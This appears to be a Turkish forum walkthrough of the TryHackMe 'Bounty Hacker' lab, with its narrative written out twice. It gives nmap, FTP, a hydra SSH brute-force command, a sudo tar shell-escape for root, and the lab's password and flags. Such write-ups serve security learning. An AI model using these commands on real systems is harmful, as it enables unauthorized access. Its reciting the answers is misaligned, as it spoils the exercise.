Selamun Aleyküm arkadaşlar, TryHackMe de bulunan Bounty Hacker makinasını çözeceğiz.
Her zaman olduğu gibi port taramasıyla başlayalım..
4 adet portumuz varmış, ;
20 ftp-data(closed),
21 anon-ftp,
22 ssh,
80 http
80 portunu görür görmez ben web sitesine gidiyorum hemen,
indexi incelediğim de ve kaynak kodlarına baktığımda bişey bulamadım,
sırada terminali açıp ftp bağlanmak var.
ftp bağlandığımız da 2 adet txt dosyası olduğunu gördük,
bilgisayarımıza indirelim .
diyerek ftp içerisindeki tüm dosyaların bilgisayarımıza indirmesini istiyoruz.
task.txt içeriğine baktığımız da ilk sorumuzun cevabını bulmuş olduk.
locks.txt nin içerisinde ne olduğuna bakınalım..
bir sonraki soruda bu liste ile nerede Brute Force(Deneme-yanılma) yapabileceğimizi soruyor,portlara baktığımız da ssh portu görüyoruz burada yapabileceğimizi düşünerek ssh deniyoruz ve cevap bu evet.
ssh portuna bağlanabilmek için elimizde kullanıcı adı ve bir password listesi var, şimdi hydra toolu ile bf yaparak şifreyi öğrenmeye çalışıyoruz.
Şifremizide bulduğumuza göre bakalım ssh da neler varmış;
user txt içerisinde flagı istiyordu bizden,
sıra geldi root.txt flagına,
önce hangi dizinde olduğuma baktım, sonra kök dizinine gittim. ve root dizinine gitmek istediğimde root olmadığım için Permission denied hatası aldım.
yetkimizi yükseltmemiz lazım,
burada ilk olarak hangi programı kullandığımı öğrenmek istedim
şifreli bir şekilde root yetkisinde tar diye bir programı kullandığımı gördüm,
bunun için ise suid yetkileri içeren
göz gezdirdim ve bunu buldum,
şifreyi girip whoami ye tekrar baktığım da root olduğumu gördüm,
root dizinine gidip root.txt okuyarak son sorumuzu da cevaplamış olduk.
Her zaman olduğu gibi port taramasıyla başlayalım..
Kod:
[CENTER] [B]Nmap -A -v 10.10.229.80[/B]
[/CENTER]
4 adet portumuz varmış, ;
20 ftp-data(closed),
21 anon-ftp,
22 ssh,
80 http
80 portunu görür görmez ben web sitesine gidiyorum hemen,
indexi incelediğim de ve kaynak kodlarına baktığımda bişey bulamadım,
sırada terminali açıp ftp bağlanmak var.
Kod:
[CENTER][B]ftp 10.10.229.80[/B]
[/CENTER]
ftp bağlandığımız da 2 adet txt dosyası olduğunu gördük,
bilgisayarımıza indirelim .
Kod:
[CENTER][B]mget *[/B]
[/CENTER]
task.txt içeriğine baktığımız da ilk sorumuzun cevabını bulmuş olduk.
Kod:
[CENTER][B]Who wrote the task list? : lin[/B]
[/CENTER]
bir sonraki soruda bu liste ile nerede Brute Force(Deneme-yanılma) yapabileceğimizi soruyor,portlara baktığımız da ssh portu görüyoruz burada yapabileceğimizi düşünerek ssh deniyoruz ve cevap bu evet.
Kod:
[CENTER][B]What service can you bruteforce with the text file found? : ssh[/B]
[/CENTER]
Kod:
[CENTER][B]hydra -l lin -p locks.txt ssh://10.10.229.80[/B]
[/CENTER]
Kod:
[CENTER][B]What is the users password? : RedDr4gonSynd1cat3[/B]
[/CENTER]
Kod:
[CENTER][B]ssh [email protected][/B]
[/CENTER]
user txt içerisinde flagı istiyordu bizden,
Kod:
[CENTER][B]user.txt : THM{CR1M3_SyNd1C4T3}[/B][/CENTER]
önce hangi dizinde olduğuma baktım, sonra kök dizinine gittim. ve root dizinine gitmek istediğimde root olmadığım için Permission denied hatası aldım.
yetkimizi yükseltmemiz lazım,
burada ilk olarak hangi programı kullandığımı öğrenmek istedim
Kod:
[CENTER][B]sudo -l[/B]
[/CENTER]
bunun için ise suid yetkileri içeren
Kod:
[CENTER] [B]https://gtfobins.github.io/[/B]
[/CENTER]
Kod:
[CENTER][B]sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh[/B]
[/CENTER]
root dizinine gidip root.txt okuyarak son sorumuzu da cevaplamış olduk.
Kod:
[CENTER][B]root.txt : THM{80UN7Y_h4cK3r} [/B]
[/CENTER]
Son düzenleme: